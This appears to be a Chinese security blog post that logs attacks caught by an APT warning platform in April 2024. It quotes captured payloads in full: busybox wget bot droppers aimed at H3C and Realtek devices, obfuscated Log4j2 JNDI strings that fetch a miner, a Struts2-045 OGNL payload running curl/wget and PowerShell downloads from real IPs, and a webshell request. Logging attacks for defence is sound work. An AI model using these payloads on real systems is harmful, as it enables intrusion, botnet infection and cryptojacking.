APT预警攻击平台截获Nday

APT预警攻击平台截获Nday

2024年4月26日

设备漏洞【漏洞利用】H3C Magic R100任意代码执行漏洞(CVE-2022-34598)

000000100020003000400050006000706F 72 66 3B 63 64 20 2F   74 6D 70 3B 20 72 6D 20
2D 72 66 20 6D 69 70 73   65 6C 3B 20 2F 62 69 6E
2F 62 75 73 79 62 6F 78   20 77 67 65 74 20 68 74
74 70 3A 2F 2F 35 31 2E   32 35 34 2E 31 35 36 2E
32 35 2F 62 6F 74 2E 6D   70 73 6C 3B 20 63 68 6D
6F 64 20 2B 78 20 62 6F   74 2E 6D 70 73 6C 3B 20
2E 2F 62 6F 74 2E 6D 70   73 6C 20 72 6B 73 70 6C
6F 69 74 3B 20 23 0Aorf;cd /tmp; rm
-rf mipsel; /bin
/busybox wget ht
tp://51.254.156.
25/bot.mpsl; chm
od +x bot.mpsl;

在这里插入图片描述

设备漏洞【漏洞利用】Realtek SDK UPnP任意命令注入漏洞(CVE-2021-35394)

000000100020003000400050006000706F 72 66 3B 63 64 20 2F   74 6D 70 3B 20 72 6D 20
2D 72 66 20 6D 69 70 73   65 6C 3B 20 2F 62 69 6E
2F 62 75 73 79 62 6F 78   20 77 67 65 74 20 68 74
74 70 3A 2F 2F 35 31 2E   32 35 34 2E 31 35 36 2E
32 35 2F 62 6F 74 2E 6D   70 73 6C 3B 20 63 68 6D
6F 64 20 2B 78 20 62 6F   74 2E 6D 70 73 6C 3B 20
2E 2F 62 6F 74 2E 6D 70   73 6C 20 72 6B 73 70 6C
6F 69 74 3B 20 23 0Aorf;cd /tmp; rm
-rf mipsel; /bin
/busybox wget ht
tp://51.254.156.
25/bot.mpsl; chm
od +x bot.mpsl;

在这里插入图片描述
在这里插入图片描述

远程代码执行【WEB攻击】Apache Log4j2 任意代码执行漏洞(CVE-2021-44228)

请求内容

authorization=&login.timezone=GMT+8:00&province=&city=&rectangle=&login_username=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://colj0qcsjrgk9u7maq0gby3pkekxh7uyo.oast.pro}

外带信息

{"oob": {"domain": "146.59.16.84", "protocol": "tcp"}}

请求:

http://xxx.xxx.xxx.xxx:9092/t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//146.59.16.84:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')

请求头

Accept: application/json, text/plain, */*
X-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//146.59.16.84:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')
User-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-

命令注入【WEB攻击】Struts2-045远程命令执行漏洞(CVE-2017-5638)

外带信息

{"oob": {"domain": "87.121.105.232", "protocol": "tcp"},"relation": {"cmd": "curl"}}

请求头

Host: xxx.xx.xxx.xxxx:xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd="(curl -s http://0x5778549c/i || wget -q -O - http://0x5778549c/i || lwp-download http://0x5778549c/i /dev/shm/i) | bash -sh; bash /dev/shm/i; rm -rf /dev/shm/i; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8weDU3Nzg1NDljL3kiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8weDU3Nzg1NDljL3kiKS5yZWFkKCkpJw== | base64 -d | bash -").(#cmd1="powershell iex(New-Object Net.WebClient).DownloadString('http://87.121.105.232/bin.ps1')").(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{"cmd.exe","/c",#cmd1}:{"/bin/bash","-c",#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Content-Length: 0

在这里插入图片描述

信息泄露【WEB攻击】检测到探测服务器config.json文件

这个竟然成功了,经排查,不过没啥影响

http://xxx.xx.xxx.xxx:xxxx/sxxyxxn/common/cap4/template/base/conditions/config.json

命令注入【WEB攻击】检测到系统命令注入攻击(ipconfig)

外带信息

{"relation": {"cmd": "ipconfig"}}

一句话木马

http://xxx.xxx.xxxx.xxxx:xxxx/seeyon/qweasdzxc.jsp?pwd=0&i=ipconfig

响应头

Content-Type: text/html
Content-Length: 537
Date: Sat, 27 Apr 2024 16:32:31 GMT
Connection: close
Server: SY8045

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/5279.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

请求接口报错:java.lang.IllegalStateException: argument type mismatch

目录 一、场景二、报错信息三、控制器四、接口调用五、原因六、解决 一、场景 1、调用后端接口报错 2、接口参数以Json方式传递 – 二、报错信息 java.lang.IllegalStateException: argument type mismatch Controller [com.xxx.huarunshouzheng.controller.MallControlle…

线性结构与树形结构的区别

线性结构与树形结构在数据组织和关系表达上存在显著的差异。 线性结构是一个有序的数据元素的集合,其中的每个数据元素都有且仅有一个直接前驱和一个直接后继(除了第一个元素没有前驱,最后一个元素没有后继)。这种一对一的关系使得…

CCF-CSP真题题解:201409-3 字符串匹配

201409-3 字符串匹配 #include <iostream> #include <cstring> #include <algorithm> using namespace std;int n, type; string s, p;string tolower(string s) {string res;for (char c : s) res tolower(c);return res; }int main() {cin >> p >…

2024年华东杯数学建模思路+论文+代码

B 题 自动驾驶中的转弯问题 随着科学技术的迅速发展&#xff0c;自动驾驶已不再是无法触及的奇迹。但自动驾驶也面临着 一系列的技术难题和安全挑战。自动驾驶汽车需要精确、实时地感知和理解环境&#xff0c;以便做 出高效的驾驶决策。在遇到复杂天气时&#xff0c;还需要…

Kappa系数-评估分类算法的表现

#创作灵感# 涉及到算法的评价指标&#xff0c;其中有个 Kappa 系数&#xff0c;这里记录一下&#xff0c;便于理解。 #正文# 在机器学习领域&#xff0c;评价分类算法的准确性是至关重要的一环。而Kappa系数作为一种评价分类算法准确性的方法&#xff0c;能够帮助我们更全面地…

go 映射(Map)使用注意事项

在 Go 语言中&#xff0c;映射&#xff08;Map&#xff09;是一种非常有用的数据结构&#xff0c;用于存储键值对。以下是使用 Go 映射时的一些注意事项&#xff1a; 声明和初始化&#xff1a; 使用 map[KeyType]ElementType 形式声明映射类型。使用 make 函数初始化映射&#…

react中解决 Capture Value 问题

解决 Capture Value 问题通常涉及确保你的函数或 Hook 能够访问到最新的状态或 props。这里有几种常见的方法&#xff1a; 使用依赖数组&#xff1a; 对于 useEffect、useCallback 和 useMemo&#xff0c;你可以通过在依赖数组中列出所有外部依赖来确保捕获的值是最新的。当依赖…

【探索Linux】P.33(HTTP协议)

阅读导航 引言一、认识URL二、URL编码和解码1. Urlencode&#xff08;URL编码&#xff09;2. Urldecode&#xff08;URL解码&#xff09; 三、HTTP的方法四、HTTP的状态码五、HTTP常见Header六、最简单的HTTP服务器温馨提示 引言 在上一篇文章中&#xff0c;我们深入探讨了“自…

【数据结构与算法】力扣 150. 逆波兰表达式求值

题目描述 给你一个字符串数组 tokens &#xff0c;表示一个根据 逆波兰表示法 表示的算术表达式。 请你计算该表达式。返回一个表示表达式值的整数。 注意&#xff1a; 有效的算符为 、-、* 和 / 。每个操作数&#xff08;运算对象&#xff09;都可以是一个整数或者另一个表…

[学习笔记] Android综合_2024-4-30

数据库注意&#xff1a; 前端与后端之间 要有事务、锁。 要用innodb才支持事务。 记得使用接口测试工具测试&#xff08;HTTP ResuestListener&#xff09;。 后端给前端发返回的数据类型一定要是map。 为了简洁&#xff0c;后端所有参数用post接口&#xff0c;别用get接口…

大模型日报2024-04-30

大模型日报 2024-04-30 大模型资讯 2024年&#xff1a;检索增强生成&#xff08;RAG&#xff09;技术的兴起 摘要: 2024年4月&#xff0c;Mikhail Mew报道&#xff0c;检索增强生成&#xff08;RAG&#xff09;技术近来成为热点。尽管大型语言模型&#xff08;LLMs&#xff09;…

LLaMA3(Meta)微调SFT实战Meta-Llama-3-8B-Instruct

LlaMA3-SFT LlaMA3-SFT, Meta-Llama-3-8B/Meta-Llama-3-8B-Instruct微调(transformers)/LORA(peft)/推理 项目地址 https://github.com/yongzhuo/LLaMA3-SFT默认数据类型为bfloat6 备注 1. 非常重要: weights要用bfloat16/fp32/tf32(第二版大模型基本共识), 不要用fp16, f…

坚守食品安全,美乐家(中国)守护大众健康

在现代社会&#xff0c;食品安全已成为公众关注的焦点&#xff0c;对于食品行业的企业而言&#xff0c;确保食品安全是极为重要的责任。产品是消费者与企业之间最直接、最紧密的纽带&#xff0c;也是消费者对品牌的最直观印象。因此&#xff0c;美乐家一直将产品质量、安全、绿…

LLMs之MiniCPM:MiniCPM(揭示端侧大语言模型的无限潜力)的简介、安装和使用方法、案例应用之详细攻略

LLMs之MiniCPM&#xff1a;MiniCPM(揭示端侧大语言模型的无限潜力)的简介、安装和使用方法、案例应用之详细攻略 目录 MiniCPM的简介 0、更新日志 1、公开的模型 2、局限性 3、文本模型评测 越级比较: 同级比较&#xff1a; Chat模型比较&#xff1a; DPO后模型比较&am…

Git安全实践:保护你的代码仓库

Git安全实践&#xff1a;保护你的代码仓库 概要&#xff1a; 在软件开发领域&#xff0c;代码仓库的安全性至关重要。本文深入探讨了Git的安全实践&#xff0c;包括访问控制、加密传输、审计与监控、漏洞管理和安全意识提升等方面&#xff0c;旨在帮助读者构建一个安全可靠的代…

【TCP:可靠数据传输,快速重传,流量控制,TCP流量控制】

文章目录 可靠数据传输TCP&#xff1a;可靠数据传输TCP发送方事件快速重传流量控制TCP流量控制 可靠数据传输 TCP&#xff1a;可靠数据传输 TCP在IP不可靠服务的基础上建立了rdt 管道化的报文段 GBN or SR 累计确认&#xff08;像GBN&#xff09;单个重传定时器&#xff08;像…

XYCTF 2024

Web 参考博客&#xff1a;https://www.yuque.com/yunzhiyunweiji/wrgkex/rfpnkn0293l7cp09#ezMake ezhttp Via - HTTP | MDN 代理那里难住了 XFF不给用可以用client-ip ezmd5 让我们上传图片并比较&#xff0c;结合题目名可以猜测应该是比较两个图片的md5值是否相同&…

C# 窗体控件BackgroundWorker

介绍 如果只有一个主线程&#xff0c;那么当窗体执行一些循环之类的操作时&#xff0c;窗体界面的控件将无法操作&#xff0c;因为该线程的资源&#xff0c;都拿来执行循环操作了&#xff0c;这是&#xff0c;我们可以使用Thread类来开启另一个线程&#xff0c;来进行繁琐冗长的…

ES6之rest参数、扩展运算符

文章目录 前言一、rest参数二、扩展运算符 1.将数组转化为逗号分隔的参数序列2.应用总结 前言 rest参数与arguments变量相似。ES6引入rest参数代替arguments&#xff0c;获取函数实参。扩展运算符能将数组转化为参数序列。 一、rest参数 function namelist1() {console.log(ar…

使用硬盘对拷方法将数据无损转移到另一个硬盘!

硬盘对拷&#xff0c;其实就是磁盘克隆&#xff0c;很多人喜欢将其说成对拷&#xff0c;或者硬盘复制等&#xff0c;但不管怎么说&#xff0c;他们的目的都是一个&#xff0c;想要把原硬盘上的全部数据&#xff08;包括系统、程序、个人文件、隐藏配置数据等&#xff09;都无损…